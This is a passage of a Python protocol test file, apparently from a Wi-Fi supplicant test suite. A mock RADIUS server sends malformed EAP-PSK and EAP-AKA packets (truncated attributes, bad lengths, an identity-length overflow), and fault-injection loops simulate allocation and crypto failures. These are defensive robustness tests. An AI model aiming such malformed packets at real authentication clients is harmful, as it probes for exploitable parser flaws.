with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
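# EAP-PSK (RFC 4764) is a four-message exchange; the octet following the
# EAP Type below is the Flags field, whose two most significant bits
# carry the message type T. Thus 0x00 is a valid first message, 0x80
# (T=2) marks the third message, and 0xc0 (T=3) is invalid as a first
# message.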
def test_eap_proto_psk(dev, apdev):
"""EAP-PSK protocol tests"""
def psk_handler(ctx, req):
logger.info("psk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-zero T in first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short third message")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect T in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing PCHANNEL in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalic MAC_S in third message")
return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16 + 21,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(psk_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 6):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Test: Invalid PSK length")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_psk_errors(dev, apdev):
"""EAP-PSK local error cases"""
check_eap_capa(dev[0], "PSK")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with fail_test(dev[0], i, "eap_psk_key_setup;eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_psk_process_1"),
(2, "=eap_psk_process_1"),
(1, "eap_msg_alloc;eap_psk_process_1"),
(1, "=eap_psk_process_3"),
(2, "=eap_psk_process_3"),
(1, "eap_msg_alloc;eap_psk_process_3"),
(1, "eap_psk_getKey"),
(1, "eap_psk_get_session_id"),
(1, "eap_psk_get_emsk") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_psk_process_1"),
(1, "omac1_aes_128;eap_psk_process_3"),
(1, "aes_128_eax_decrypt;eap_psk_process_3"),
(2, "aes_128_eax_decrypt;eap_psk_process_3"),
(3, "aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_128_eax_encrypt;eap_psk_process_3"),
(2, "aes_128_eax_encrypt;eap_psk_process_3"),
(3, "aes_128_eax_encrypt;eap_psk_process_3"),
(1, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(2, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(3, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(4, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(5, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(6, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(7, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(8, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(9, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(10, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(1, "aes_ctr_encrypt;aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_ctr_encrypt;aes_128_eax_encrypt;eap_psk_process_3") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
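# EAP-SIM (RFC 4186) and EAP-AKA/AKA' (RFC 4187/5448) subtype and
# attribute identifiers. Attribute types 0-127 are non-skippable (an
# unrecognized one aborts the exchange); types 128-255 are skippable.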
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
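# The AT_* attributes above are TLVs whose Length octet is counted in
# 4-octet units and includes the type/length header itself. A minimal
# sketch of that layout (a hypothetical helper for illustration only;
# the tests below inline the equivalent struct.pack() calls, and this
# assumes the module-level struct import):
def _sim_attr_sketch(attr_type, reserved, value=b''):
    # Pad the value to a 4-octet boundary and express the total length
    # (type + length + 2-octet reserved/short-value field + value) in
    # 4-octet units, per the general format in RFC 4187 section 8.1.
    pad = (4 - (len(value) % 4)) % 4
    total = 4 + len(value) + pad
    return struct.pack(">BBH", attr_type, total // 4, reserved) + \
        value + b'\x00' * pad
# For example, _sim_attr_sketch(EAP_SIM_AT_ANY_ID_REQ, 0) yields the same
# four octets as the inline "EAP_SIM_AT_ANY_ID_REQ, 1, 0" used below.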
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
0xbe, 0x2e, 0xbb, 0xa9, 0xfa, 0x2e, 0x82, 0x36,
0x37, 0x8c, 0x32, 0x41, 0xb7, 0xc7, 0x58, 0xa3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with Checkcode claiming no identity round was used")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with mismatching Checkcode value")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with Checkcode claimin identity round was used")
return struct.pack(">BBHBBHBBH5L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_REAUTHENTICATION,
0,
EAP_SIM_AT_CHECKCODE, 6, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_RAND length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_RAND, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_AUTN length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_AUTN, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unencrypted AT_PADDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PADDING, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NONCE_MT length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NONCE_MT, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_MAC length")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_MAC, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid AT_NOTIFICATION length")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_NOTIFICATION, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AT_IDENTITY overflow")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_IDENTITY, 1, 0xffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_VERSION_LIST, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
